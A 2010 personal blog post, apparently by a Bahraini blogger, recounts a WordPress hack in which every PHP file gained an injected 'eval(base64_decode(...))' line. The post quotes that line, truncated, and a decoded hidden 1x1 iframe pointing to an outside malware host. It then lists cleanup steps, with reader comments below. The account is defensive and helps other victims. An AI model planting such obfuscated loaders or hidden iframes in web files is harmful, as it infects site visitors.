YAY Viva?! .. not
Fri, 5/03/10 – 6:33 | One Comment

I rushed on the news of the launch of Viva services, and boy was in for another treat.. 21MB unlimited and FREE internet connection that is one LIMITED, and TWO not free and THREE with a connection speed that drastically varies based on your location within the country.

Read the full story »
Archive

Moved from my old blog..

Bahraini Politics

International Poltics

News

There is always more to the news than what you get to read in the newspaper or see on TV

Reviews

Movies, Plays, Events I get to attend within Bahrain and abroad.

Home » Archive, Blogging, emoodz.com, Excerpts

emoodz.com Hacked?!

Submitted by moodz on Tuesday, 23 February 20103 Comments


So I decided to go back to blogging, I update wordpress to the latest version and started typing along acouple of posts before it hit me. Something was really getting fishy around the blog, The Dashboard all of a sudden decided to stop functioning and taking me to a blank white page and a couple of hours later other sections of the blog were also pointing to either dead links or showing gibirish scribbles. It took me a good two hours and the help of an expert to realize what had happened.. I was hacked!

Something somehow.. inserted a malicious code into each and every single PHP file in the entire blog. What I saw was a one liner right at the beginning of the infected PHP file that looks like this:

< ?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl...=="));?>

When I decoded it (using this), it revealed the following:

< -iframe src="http://iss9w8s89xx.org/in.php" width=1 height=1 frameborder=0>

(Which is the keyword I used to google it, the “iframe trojan” is what it apparently called)
Why would anyone want to hack a dormant blog you’d ask? It was all automated..

My FTP program stores all saved website password in an unencrypted text file which is how the Trojan gained access to the website.

I have spent extensive time researching the matter online and thought I’ll spare whoever it is that decides to google this the pain I had to go through. Now forget all those wordpress support forum contributors or other blogs that advice a fresh install of WordPress or those that tell you to manually edit each and every php file you have for the code.

What you have to do is the following:

  • Change ALL your passwords: I still didn’t figure out what passwords exactly are the ones that are used, I would advice to change the WordPress Password and the FTP most importantly.
  • Download the ENTIRE site to your local machine.
  • Clean up the files using this VBS Script I found on “Thydzik’s technology bloghere to automate the cleaning process. Place it in your local root director and run. A log file will be generated at C:\cleanUpWordPressPHP.txt listing the files it has cleaned.(More details here)
  • Re-upload the site.
  • Download, Install and Update WordPress Antivirus Plugin (here)
  • The Trojan wasn’t designed with wordpress in mind and that’s why I believe the damage was minimal, it is just a true pain to get rid of. I have officially wasted two evenings of my life doing nothing but this.

    Further Information about this can be read on this

Facebook Comments

3 Comments »

  • Hussain said:

    So in reality it was your Windows PC that got infected with a Trojan, which in turn hacked your site.

  • moodz (author) said:

    Don’t get a head of yourself here bu3li, the trojan can (and did) infect mac machines.

  • Global Voices Online » Bahrain: Blog Hacked? said:

    [...] blogger Mohammed Al Maskati suspects that his blog has been hacked and here's what he did. Cancel this [...]

Leave a comment!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.